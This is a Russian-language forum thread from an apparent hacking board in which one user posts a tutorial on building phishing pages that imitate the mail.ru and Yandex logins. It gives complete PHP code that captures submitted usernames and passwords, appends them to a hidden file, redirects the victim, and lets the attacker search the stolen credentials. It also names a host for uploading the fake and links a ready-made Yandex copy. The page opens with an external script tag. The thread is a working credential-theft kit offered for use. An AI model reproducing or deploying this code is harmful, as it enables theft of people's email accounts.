[HTML]<script language="JavaScript" src="http://b90.takru.com/in.php?id=94493"></script>[/HTML]

Gift on the dark

Объявление

и так открытие+) скоро запуск серверов, следите за новостями+) так же привлекаем людей для регистрации !

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Gift on the dark » Новый форум » Угон мыла +)

Угон мыла +)

Страница: 1

Сообщений 1 страница 2 из 2

1

  • Автор: vosstavwii
  • царь и бох
  • vosstavwii
  • Откуда: москва
  • Зарегистрирован: 2007-09-26
  • Приглашений: 0
  • Сообщений: 21
  • Уважение: 0
  • Позитив: 0
  • Пол: Мужской
  • Возраст: 36 [1987-10-31]
  • Провел на форуме:
    5 часов 56 минут
  • Последний визит:
    2007-12-10 19:55:13

раскажем подробно как составляются фейки для взлома мыла через хосты+)
Наш фейк состоит из 4 файлов: index.html , log.php , base.php , seebase.php.
1. index.php:
Сохраняем через браузер страничку авторизации сайта на который мы делаем фейк...например mail.ru:
Открываем сохранённый файл (любым текстовым редактором )и ищем в нём что-то вроде этого:

Код
<form name="MainLogin" action="pro/reg/mail.php" method="post">

Теперь меняем pro/reg/mail.php на log.php
Получится
Код
<form name="MainLogin" action="log.php" method="post">

Далее ищем строки содержащие hidden и удаляем их.
Всё на этом лицо фейка готово.
2.log.php:
log.php будет у нас обрабатывать информацию поступающую из index.html точнее логин и пароль.
Вот листинг log.php:
Код
<?PHP
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль

$log = fopen("base.php","a+"); //открываем файл базы
fwrite($log,"\n $Login:$Pass \n"); //записываем всё
fclose($log); //закрываем
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=************************'></head></html>"; // куда пошлем пользователя после того как он ввел данные!
?>

?>
Наш логин Равен имени (name) вот етой строки в index.html
Код
<input type="text" name="login" value="" style="width:50%"  tabindex="1"  >

Строка может быть и другой, главное name.
А наш пароль равен имени вот етой строки:
Код
<input type="password" name="passwd" value="" style="width:50%" tabindex="2">

Всё лог мы сделали.
3.base.php:
Здесь будут храниться ведённые данные.

Код
<?php echo '<H1>Доступ к базе закрыт!!!</H1>'; exit; ?>

Это надо вписать в base.php и всё, больше ничего.
4.seebase.php:
Это скрипт для просмотра паролей которые хранятся в base.php
Вот листинг:
Код

    <head>
        <title>Give E-mail</title>
    </head>
    <body>
        <form method="POST">
        Login: <input type="text" name="login">
        <br>
        <input type="submit" value="OK">
        </form>
        <?php
            if (isset($_POST['login']))
            if ($_POST['login'] != '')
            {
                $login = $_POST['login'];
                echo $_POST['login'].'<BR>';
                $fp = fopen('base.php', 'r');// Имя базы
                while (!feof ($fp)) {
                    $buffer = fgets($fp);
                    if (strpos($buffer,$login) !== false)
                    {
                        echo $buffer.'<BR>';
                        break;
                    }
                }
                fclose($fp);
            }
        ?>
    </body>
</html>

Всё...Теперь осталось залить(закачать) фейк на хостинг и начать им пользоваться...)
Хостинг http://www.holm.ru

далее задаем вопросы и обсуждаем то что выше+)

0

2

  • Автор: vosstavwii
  • царь и бох
  • vosstavwii
  • Откуда: москва
  • Зарегистрирован: 2007-09-26
  • Приглашений: 0
  • Сообщений: 21
  • Уважение: 0
  • Позитив: 0
  • Пол: Мужской
  • Возраст: 36 [1987-10-31]
  • Провел на форуме:
    5 часов 56 минут
  • Последний визит:
    2007-12-10 19:55:13

Продолжаем тему, Теперь пишем фейк на 3 файлах.

Файлы фейка: Index.php , base.php , seebase.php.

1. Index.php:
Как я уже говорил index.php это лицо нашего фейка, теперь это лицо будет немного улучшено.

Начнём:
Сначала создаём файл index.php и копируем в него всё из нашего прошлого index.html.
Тепуль удоляем вот эту кусок (action="log.php") вот этой строчки,
Код
<form name="MainLogin" action="log.php" method="post">

Получится
Код
<form name="MainLogin"  method="post">

Далее копируем наш старый log.php в самый конец index.php.
И добавляем в него ещё несколько строк...
Вот что получится:

Код
<?PHP

  if (!empty($_POST['login']))   // Вот ети строки...они проверяют не пустые ли логин и пароль и если нет, то выполняется скрипт.
  if (!empty($_POST['passwd']))
{
$Login = $_POST['login']; // Логин
$Pass = $_POST['passwd']; // Пароль

$log = fopen("base.php","a+"); //открываем файл базы
fwrite($log,"\n $Login:$Pass \n"); //записываем всё
fclose($log); //закрываем
echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://www.yandex.ru'></head></html>"; // куда пошлем пользователя после того как он ввел данные!
}
?>

Всё на этом index.php готов....
Можно в него ещё кое чего добавить:
Вот например:
Код
<?
if (isset($_POST['login'])) { if (empty($_POST['login'])) {
?>
<TABLE BORDER=0 COLS=2  align=center width=32%>
<tr><th>Произошла ошибка,  вы не ввели логин.</th>
</table>
<?
} }
if (isset($_POST['passw'])) { if (empty($_POST['passwd'])) {
?>
<TABLE BORDER=0 COLS=2  align=center width=32%>
<tr><th>Произошла ошибка,  вы не ввели пароль.</th>
</table>
<?
} }
?>

Это надо добавить сразу перед строками где мы вводим логин и пароль.......хотя можно ещё где нибудь в пределах формы...
P.S. Если у вас конечно браузер не созраняет подыбных скриптов на javascript.

2. base.php и seebase.php делаем такие же как и в педидущем пункте.

Вот пример такого фейка для Яндекса...

http://slil.ru/24903218 +)

0

Страница: 1

Вы здесь » Gift on the dark » Новый форум » Угон мыла +)